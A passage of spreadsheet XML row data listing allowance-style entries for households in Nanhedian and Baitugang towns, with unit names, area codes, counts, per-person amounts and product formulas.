        <v>4113211004</v>
      </c>
      <c r="G2425" s="24"/>
      <c r="H2425" s="24"/>
      <c r="I2425" s="24">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="J2425" s="24"/>
      <c r="K2425" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2426" customHeight="1" spans="1:11">
      <c r="A2426" s="23" t="s">
        <v>6400</v>
      </c>
      <c r="B2426" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2426" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2426" s="24" t="s">
        <v>2880</v>
      </c>
      <c r="E2426" s="24" t="s">
        <v>6401</v>
      </c>
      <c r="F2426" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2426" s="24">
        <v>1</v>
      </c>
      <c r="H2426" s="25">
        <v>365</v>
      </c>
      <c r="I2426" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2426" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2426" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2427" customHeight="1" spans="1:11">
      <c r="A2427" s="23" t="s">
        <v>6402</v>
      </c>
      <c r="B2427" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2427" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2427" s="24" t="s">
        <v>6403</v>
      </c>
      <c r="E2427" s="24" t="s">
        <v>6337</v>
      </c>
      <c r="F2427" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2427" s="24">
        <v>3</v>
      </c>
      <c r="H2427" s="25">
        <v>290</v>
      </c>
      <c r="I2427" s="24">
        <f t="shared" si="37"/>
        <v>870</v>
      </c>
      <c r="J2427" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2427" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2428" customHeight="1" spans="1:11">
      <c r="A2428" s="23" t="s">
        <v>6404</v>
      </c>
      <c r="B2428" s="24" t="str">
        <f>B2427</f>
        <v>南河店镇</v>
      </c>
      <c r="C2428" s="24" t="str">
        <f>C2427</f>
        <v>县社</v>
      </c>
      <c r="D2428" s="31" t="s">
        <v>6405</v>
      </c>
      <c r="E2428" s="31" t="s">
        <v>1250</v>
      </c>
      <c r="F2428" s="24" t="str">
        <f>F2427</f>
        <v>4113211004</v>
      </c>
      <c r="G2428" s="24"/>
      <c r="H2428" s="24"/>
      <c r="I2428" s="24">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="J2428" s="24"/>
      <c r="K2428" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2429" customHeight="1" spans="1:11">
      <c r="A2429" s="23" t="s">
        <v>6406</v>
      </c>
      <c r="B2429" s="24" t="str">
        <f>B2428</f>
        <v>南河店镇</v>
      </c>
      <c r="C2429" s="24" t="str">
        <f>C2428</f>
        <v>县社</v>
      </c>
      <c r="D2429" s="31" t="s">
        <v>6407</v>
      </c>
      <c r="E2429" s="31" t="s">
        <v>6408</v>
      </c>
      <c r="F2429" s="24" t="str">
        <f>F2428</f>
        <v>4113211004</v>
      </c>
      <c r="G2429" s="24"/>
      <c r="H2429" s="24"/>
      <c r="I2429" s="24">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="J2429" s="24"/>
      <c r="K2429" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2430" customHeight="1" spans="1:11">
      <c r="A2430" s="23" t="s">
        <v>6409</v>
      </c>
      <c r="B2430" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2430" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2430" s="24" t="s">
        <v>6410</v>
      </c>
      <c r="E2430" s="24" t="s">
        <v>6411</v>
      </c>
      <c r="F2430" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2430" s="24">
        <v>1</v>
      </c>
      <c r="H2430" s="25">
        <v>365</v>
      </c>
      <c r="I2430" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2430" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2430" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2431" customHeight="1" spans="1:11">
      <c r="A2431" s="23" t="s">
        <v>6412</v>
      </c>
      <c r="B2431" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2431" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2431" s="24" t="s">
        <v>6413</v>
      </c>
      <c r="E2431" s="24" t="s">
        <v>6414</v>
      </c>
      <c r="F2431" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2431" s="24">
        <v>1</v>
      </c>
      <c r="H2431" s="25">
        <v>365</v>
      </c>
      <c r="I2431" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2431" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2431" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2432" customHeight="1" spans="1:11">
      <c r="A2432" s="23" t="s">
        <v>6415</v>
      </c>
      <c r="B2432" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2432" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2432" s="24" t="s">
        <v>6416</v>
      </c>
      <c r="E2432" s="24" t="s">
        <v>6417</v>
      </c>
      <c r="F2432" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2432" s="24">
        <v>1</v>
      </c>
      <c r="H2432" s="25">
        <v>365</v>
      </c>
      <c r="I2432" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2432" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2432" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2433" customHeight="1" spans="1:11">
      <c r="A2433" s="23" t="s">
        <v>6418</v>
      </c>
      <c r="B2433" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2433" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2433" s="24" t="s">
        <v>6419</v>
      </c>
      <c r="E2433" s="24" t="s">
        <v>2746</v>
      </c>
      <c r="F2433" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2433" s="24">
        <v>1</v>
      </c>
      <c r="H2433" s="25">
        <v>365</v>
      </c>
      <c r="I2433" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2433" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2433" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2434" customHeight="1" spans="1:11">
      <c r="A2434" s="23" t="s">
        <v>6420</v>
      </c>
      <c r="B2434" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2434" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2434" s="24" t="s">
        <v>6421</v>
      </c>
      <c r="E2434" s="24" t="s">
        <v>6422</v>
      </c>
      <c r="F2434" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2434" s="24">
        <v>1</v>
      </c>
      <c r="H2434" s="25">
        <v>365</v>
      </c>
      <c r="I2434" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2434" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2434" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2435" customHeight="1" spans="1:11">
      <c r="A2435" s="23" t="s">
        <v>6423</v>
      </c>
      <c r="B2435" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2435" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2435" s="24" t="s">
        <v>6424</v>
      </c>
      <c r="E2435" s="24" t="s">
        <v>6425</v>
      </c>
      <c r="F2435" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2435" s="24">
        <v>1</v>
      </c>
      <c r="H2435" s="25">
        <v>365</v>
      </c>
      <c r="I2435" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2435" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2435" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2436" customHeight="1" spans="1:11">
      <c r="A2436" s="23" t="s">
        <v>6426</v>
      </c>
      <c r="B2436" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2436" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2436" s="24" t="s">
        <v>6427</v>
      </c>
      <c r="E2436" s="24" t="s">
        <v>6428</v>
      </c>
      <c r="F2436" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2436" s="24">
        <v>1</v>
      </c>
      <c r="H2436" s="25">
        <v>365</v>
      </c>
      <c r="I2436" s="24">
        <f t="shared" ref="I2436:I2499" si="38">H2436*G2436</f>
        <v>365</v>
      </c>
      <c r="J2436" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2436" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2437" customHeight="1" spans="1:11">
      <c r="A2437" s="23" t="s">
        <v>6429</v>
      </c>
      <c r="B2437" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2437" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2437" s="24" t="s">
        <v>6430</v>
      </c>
      <c r="E2437" s="24" t="s">
        <v>6425</v>
      </c>
      <c r="F2437" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2437" s="24">
        <v>2</v>
      </c>
      <c r="H2437" s="25">
        <v>325</v>
      </c>
      <c r="I2437" s="24">
        <f t="shared" si="38"/>
        <v>650</v>
      </c>
      <c r="J2437" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2437" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2438" customHeight="1" spans="1:11">
      <c r="A2438" s="23" t="s">
        <v>6431</v>
      </c>
      <c r="B2438" s="24" t="str">
        <f>B2437</f>
        <v>南河店镇</v>
      </c>
      <c r="C2438" s="24" t="str">
        <f>C2437</f>
        <v>县社</v>
      </c>
      <c r="D2438" s="30" t="s">
        <v>6432</v>
      </c>
      <c r="E2438" s="30" t="s">
        <v>6433</v>
      </c>
      <c r="F2438" s="24" t="str">
        <f>F2437</f>
        <v>4113211004</v>
      </c>
      <c r="G2438" s="24"/>
      <c r="H2438" s="24"/>
      <c r="I2438" s="24">
        <f t="shared" si="38"/>
        <v>0</v>
      </c>
      <c r="J2438" s="24"/>
      <c r="K2438" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2439" customHeight="1" spans="1:11">
      <c r="A2439" s="23" t="s">
        <v>6434</v>
      </c>
      <c r="B2439" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2439" s="24" t="s">
        <v>6374</v>
      </c>
      <c r="D2439" s="24" t="s">
        <v>6435</v>
      </c>
      <c r="E2439" s="24" t="s">
        <v>6436</v>
      </c>
      <c r="F2439" s="24" t="s">
        <v>6437</v>
      </c>
      <c r="G2439" s="24">
        <v>1</v>
      </c>
      <c r="H2439" s="25">
        <v>365</v>
      </c>
      <c r="I2439" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2439" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2439" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2440" customHeight="1" spans="1:11">
      <c r="A2440" s="23" t="s">
        <v>6438</v>
      </c>
      <c r="B2440" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2440" s="24" t="s">
        <v>6374</v>
      </c>
      <c r="D2440" s="24" t="s">
        <v>6439</v>
      </c>
      <c r="E2440" s="24" t="s">
        <v>6440</v>
      </c>
      <c r="F2440" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2440" s="24">
        <v>1</v>
      </c>
      <c r="H2440" s="25">
        <v>365</v>
      </c>
      <c r="I2440" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2440" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2440" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2441" customHeight="1" spans="1:11">
      <c r="A2441" s="23" t="s">
        <v>6441</v>
      </c>
      <c r="B2441" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2441" s="24" t="s">
        <v>6374</v>
      </c>
      <c r="D2441" s="24" t="s">
        <v>6442</v>
      </c>
      <c r="E2441" s="24" t="s">
        <v>6389</v>
      </c>
      <c r="F2441" s="24" t="s">
        <v>6314</v>
      </c>
      <c r="G2441" s="24">
        <v>1</v>
      </c>
      <c r="H2441" s="25">
        <v>365</v>
      </c>
      <c r="I2441" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2441" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2441" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2442" customHeight="1" spans="1:11">
      <c r="A2442" s="23" t="s">
        <v>6443</v>
      </c>
      <c r="B2442" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2442" s="24" t="s">
        <v>6444</v>
      </c>
      <c r="D2442" s="24" t="s">
        <v>6445</v>
      </c>
      <c r="E2442" s="24" t="s">
        <v>3872</v>
      </c>
      <c r="F2442" s="24" t="s">
        <v>6446</v>
      </c>
      <c r="G2442" s="24">
        <v>1</v>
      </c>
      <c r="H2442" s="25">
        <v>365</v>
      </c>
      <c r="I2442" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2442" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2442" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2443" customHeight="1" spans="1:11">
      <c r="A2443" s="23" t="s">
        <v>6447</v>
      </c>
      <c r="B2443" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2443" s="24" t="s">
        <v>3443</v>
      </c>
      <c r="D2443" s="24" t="s">
        <v>6448</v>
      </c>
      <c r="E2443" s="24" t="s">
        <v>3054</v>
      </c>
      <c r="F2443" s="24" t="s">
        <v>6393</v>
      </c>
      <c r="G2443" s="24">
        <v>1</v>
      </c>
      <c r="H2443" s="25">
        <v>365</v>
      </c>
      <c r="I2443" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2443" s="24" t="s">
        <v>6449</v>
      </c>
      <c r="K2443" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2444" customHeight="1" spans="1:11">
      <c r="A2444" s="23" t="s">
        <v>6450</v>
      </c>
      <c r="B2444" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2444" s="24" t="s">
        <v>3434</v>
      </c>
      <c r="D2444" s="24" t="s">
        <v>6451</v>
      </c>
      <c r="E2444" s="24" t="s">
        <v>1866</v>
      </c>
      <c r="F2444" s="24" t="s">
        <v>6393</v>
      </c>
      <c r="G2444" s="24">
        <v>3</v>
      </c>
      <c r="H2444" s="25">
        <v>290</v>
      </c>
      <c r="I2444" s="24">
        <f t="shared" si="38"/>
        <v>870</v>
      </c>
      <c r="J2444" s="24" t="s">
        <v>4615</v>
      </c>
      <c r="K2444" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2445" customHeight="1" spans="1:11">
      <c r="A2445" s="23" t="s">
        <v>6452</v>
      </c>
      <c r="B2445" s="24" t="str">
        <f>B2444</f>
        <v>南河店镇</v>
      </c>
      <c r="C2445" s="24" t="str">
        <f>C2444</f>
        <v>供销社</v>
      </c>
      <c r="D2445" s="45" t="s">
        <v>6453</v>
      </c>
      <c r="E2445" s="102" t="s">
        <v>6454</v>
      </c>
      <c r="F2445" s="24" t="str">
        <f>F2444</f>
        <v>4113211020</v>
      </c>
      <c r="G2445" s="24"/>
      <c r="H2445" s="24"/>
      <c r="I2445" s="24">
        <f t="shared" si="38"/>
        <v>0</v>
      </c>
      <c r="J2445" s="24"/>
      <c r="K2445" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2446" customHeight="1" spans="1:11">
      <c r="A2446" s="23" t="s">
        <v>6455</v>
      </c>
      <c r="B2446" s="24" t="str">
        <f>B2445</f>
        <v>南河店镇</v>
      </c>
      <c r="C2446" s="24" t="str">
        <f>C2445</f>
        <v>供销社</v>
      </c>
      <c r="D2446" s="102" t="s">
        <v>6456</v>
      </c>
      <c r="E2446" s="102" t="s">
        <v>6457</v>
      </c>
      <c r="F2446" s="24" t="str">
        <f>F2445</f>
        <v>4113211020</v>
      </c>
      <c r="G2446" s="24"/>
      <c r="H2446" s="24"/>
      <c r="I2446" s="24">
        <f t="shared" si="38"/>
        <v>0</v>
      </c>
      <c r="J2446" s="24"/>
      <c r="K2446" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2447" customHeight="1" spans="1:11">
      <c r="A2447" s="23" t="s">
        <v>6458</v>
      </c>
      <c r="B2447" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2447" s="24" t="s">
        <v>6459</v>
      </c>
      <c r="D2447" s="24" t="s">
        <v>6460</v>
      </c>
      <c r="E2447" s="24" t="s">
        <v>6354</v>
      </c>
      <c r="F2447" s="24" t="s">
        <v>6296</v>
      </c>
      <c r="G2447" s="24">
        <v>1</v>
      </c>
      <c r="H2447" s="25">
        <v>365</v>
      </c>
      <c r="I2447" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2447" s="24" t="s">
        <v>4572</v>
      </c>
      <c r="K2447" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2448" customHeight="1" spans="1:11">
      <c r="A2448" s="23" t="s">
        <v>6461</v>
      </c>
      <c r="B2448" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2448" s="24" t="s">
        <v>3422</v>
      </c>
      <c r="D2448" s="24" t="s">
        <v>6462</v>
      </c>
      <c r="E2448" s="24" t="s">
        <v>6354</v>
      </c>
      <c r="F2448" s="24" t="s">
        <v>6393</v>
      </c>
      <c r="G2448" s="24">
        <v>1</v>
      </c>
      <c r="H2448" s="25">
        <v>365</v>
      </c>
      <c r="I2448" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2448" s="24" t="s">
        <v>4640</v>
      </c>
      <c r="K2448" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2449" customHeight="1" spans="1:1017">
      <c r="A2449" s="23" t="s">
        <v>6463</v>
      </c>
      <c r="B2449" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2449" s="24" t="s">
        <v>6464</v>
      </c>
      <c r="D2449" s="24" t="s">
        <v>6465</v>
      </c>
      <c r="E2449" s="24" t="s">
        <v>6401</v>
      </c>
      <c r="F2449" s="24" t="s">
        <v>6393</v>
      </c>
      <c r="G2449" s="24">
        <v>1</v>
      </c>
      <c r="H2449" s="25">
        <v>365</v>
      </c>
      <c r="I2449" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2449" s="24" t="s">
        <v>4654</v>
      </c>
      <c r="K2449" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2450" customHeight="1" spans="1:1017">
      <c r="A2450" s="23" t="s">
        <v>6466</v>
      </c>
      <c r="B2450" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2450" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2450" s="24" t="s">
        <v>6467</v>
      </c>
      <c r="E2450" s="24" t="s">
        <v>6468</v>
      </c>
      <c r="F2450" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2450" s="24">
        <v>1</v>
      </c>
      <c r="H2450" s="25">
        <v>365</v>
      </c>
      <c r="I2450" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2450" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2450" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2451" customHeight="1" spans="1:1017">
      <c r="A2451" s="23" t="s">
        <v>6469</v>
      </c>
      <c r="B2451" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2451" s="24" t="s">
        <v>6470</v>
      </c>
      <c r="D2451" s="24" t="s">
        <v>6471</v>
      </c>
      <c r="E2451" s="24" t="s">
        <v>6472</v>
      </c>
      <c r="F2451" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2451" s="24">
        <v>2</v>
      </c>
      <c r="H2451" s="25">
        <v>325</v>
      </c>
      <c r="I2451" s="24">
        <f t="shared" si="38"/>
        <v>650</v>
      </c>
      <c r="J2451" s="41">
        <v>45474</v>
      </c>
      <c r="K2451" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2452" customHeight="1" spans="1:1017">
      <c r="A2452" s="23" t="s">
        <v>6473</v>
      </c>
      <c r="B2452" s="24" t="str">
        <f>B2451</f>
        <v>南河店镇</v>
      </c>
      <c r="C2452" s="24" t="str">
        <f>C2451</f>
        <v>南河店镇范庄村</v>
      </c>
      <c r="D2452" s="32" t="s">
        <v>6474</v>
      </c>
      <c r="E2452" s="32" t="s">
        <v>6475</v>
      </c>
      <c r="F2452" s="24" t="str">
        <f>F2451</f>
        <v>4113211004</v>
      </c>
      <c r="G2452" s="24"/>
      <c r="H2452" s="24"/>
      <c r="I2452" s="24">
        <f t="shared" si="38"/>
        <v>0</v>
      </c>
      <c r="J2452" s="41"/>
      <c r="K2452" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2453" customHeight="1" spans="1:1017">
      <c r="A2453" s="23" t="s">
        <v>6476</v>
      </c>
      <c r="B2453" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2453" s="24" t="s">
        <v>6477</v>
      </c>
      <c r="D2453" s="24" t="s">
        <v>6478</v>
      </c>
      <c r="E2453" s="24" t="s">
        <v>6479</v>
      </c>
      <c r="F2453" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2453" s="24">
        <v>1</v>
      </c>
      <c r="H2453" s="25">
        <v>365</v>
      </c>
      <c r="I2453" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2453" s="41">
        <v>45717</v>
      </c>
      <c r="K2453" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2454" customHeight="1" spans="1:1017">
      <c r="A2454" s="23" t="s">
        <v>6480</v>
      </c>
      <c r="B2454" s="103" t="s">
        <v>6293</v>
      </c>
      <c r="C2454" s="103" t="s">
        <v>6477</v>
      </c>
      <c r="D2454" s="103" t="s">
        <v>6481</v>
      </c>
      <c r="E2454" s="103" t="s">
        <v>6482</v>
      </c>
      <c r="F2454" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2454" s="24">
        <v>1</v>
      </c>
      <c r="H2454" s="25">
        <v>365</v>
      </c>
      <c r="I2454" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2454" s="41">
        <v>45505</v>
      </c>
      <c r="K2454" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2455" customHeight="1" spans="1:1017">
      <c r="A2455" s="23" t="s">
        <v>6483</v>
      </c>
      <c r="B2455" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2455" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2455" s="24" t="s">
        <v>6484</v>
      </c>
      <c r="E2455" s="24" t="s">
        <v>6126</v>
      </c>
      <c r="F2455" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2455" s="24">
        <v>1</v>
      </c>
      <c r="H2455" s="25">
        <v>365</v>
      </c>
      <c r="I2455" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2455" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2455" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2456" customHeight="1" spans="1:1017">
      <c r="A2456" s="23" t="s">
        <v>6485</v>
      </c>
      <c r="B2456" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2456" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="D2456" s="24" t="s">
        <v>6487</v>
      </c>
      <c r="E2456" s="24" t="s">
        <v>6488</v>
      </c>
      <c r="F2456" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2456" s="24">
        <v>1</v>
      </c>
      <c r="H2456" s="25">
        <v>365</v>
      </c>
      <c r="I2456" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2456" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2456" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2457" customHeight="1" spans="1:1017">
      <c r="A2457" s="23" t="s">
        <v>6490</v>
      </c>
      <c r="B2457" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2457" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="D2457" s="24" t="s">
        <v>6491</v>
      </c>
      <c r="E2457" s="24" t="s">
        <v>6492</v>
      </c>
      <c r="F2457" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2457" s="24">
        <v>1</v>
      </c>
      <c r="H2457" s="25">
        <v>365</v>
      </c>
      <c r="I2457" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2457" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2457" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2458" customHeight="1" spans="1:1017">
      <c r="A2458" s="23" t="s">
        <v>6493</v>
      </c>
      <c r="B2458" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2458" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="D2458" s="24" t="s">
        <v>6494</v>
      </c>
      <c r="E2458" s="24" t="s">
        <v>6495</v>
      </c>
      <c r="F2458" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2458" s="24">
        <v>2</v>
      </c>
      <c r="H2458" s="25">
        <v>325</v>
      </c>
      <c r="I2458" s="24">
        <f t="shared" si="38"/>
        <v>650</v>
      </c>
      <c r="J2458" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2458" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2459" customHeight="1" spans="1:1017">
      <c r="A2459" s="23" t="s">
        <v>6496</v>
      </c>
      <c r="B2459" s="24" t="str">
        <f>B2458</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2459" s="24" t="str">
        <f>C2458</f>
        <v>白土岗镇</v>
      </c>
      <c r="D2459" s="23" t="s">
        <v>6497</v>
      </c>
      <c r="E2459" s="23" t="s">
        <v>6498</v>
      </c>
      <c r="F2459" s="170" t="str">
        <f>F2458</f>
        <v>411321122001</v>
      </c>
      <c r="G2459" s="24"/>
      <c r="H2459" s="24"/>
      <c r="I2459" s="24">
        <f t="shared" si="38"/>
        <v>0</v>
      </c>
      <c r="J2459" s="24"/>
      <c r="K2459" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2460" customHeight="1" spans="1:1017">
      <c r="A2460" s="23" t="s">
        <v>6499</v>
      </c>
      <c r="B2460" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2460" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="D2460" s="24" t="s">
        <v>6500</v>
      </c>
      <c r="E2460" s="24" t="s">
        <v>6501</v>
      </c>
      <c r="F2460" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2460" s="24">
        <v>1</v>
      </c>
      <c r="H2460" s="25">
        <v>365</v>
      </c>
      <c r="I2460" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2460" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2460" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2461" customHeight="1" spans="1:1017">
      <c r="A2461" s="23" t="s">
        <v>6502</v>
      </c>
      <c r="B2461" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2461" s="24" t="s">
        <v>3422</v>
      </c>
      <c r="D2461" s="24" t="s">
        <v>6503</v>
      </c>
      <c r="E2461" s="24" t="s">
        <v>1899</v>
      </c>
      <c r="F2461" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2461" s="24">
        <v>1</v>
      </c>
      <c r="H2461" s="25">
        <v>365</v>
      </c>
      <c r="I2461" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2461" s="24">
        <v>45170</v>
      </c>
      <c r="K2461" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2462" customHeight="1" spans="1:1017">
      <c r="A2462" s="23" t="s">
        <v>6504</v>
      </c>
      <c r="B2462" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2462" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="D2462" s="24" t="s">
        <v>6505</v>
      </c>
      <c r="E2462" s="24" t="s">
        <v>6506</v>
      </c>
      <c r="F2462" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2462" s="24">
        <v>1</v>
      </c>
      <c r="H2462" s="25">
        <v>365</v>
      </c>
      <c r="I2462" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2462" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2462" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2463" customHeight="1" spans="1:1017">
      <c r="A2463" s="23" t="s">
        <v>6507</v>
      </c>
      <c r="B2463" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2463" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="D2463" s="24" t="s">
        <v>6508</v>
      </c>
      <c r="E2463" s="24" t="s">
        <v>6509</v>
      </c>
      <c r="F2463" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2463" s="24">
        <v>2</v>
      </c>
      <c r="H2463" s="25">
        <v>325</v>
      </c>
      <c r="I2463" s="24">
        <f t="shared" si="38"/>
        <v>650</v>
      </c>
      <c r="J2463" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2463" s="24" t="s">
        <v>225</v>
      </c>
    </row>
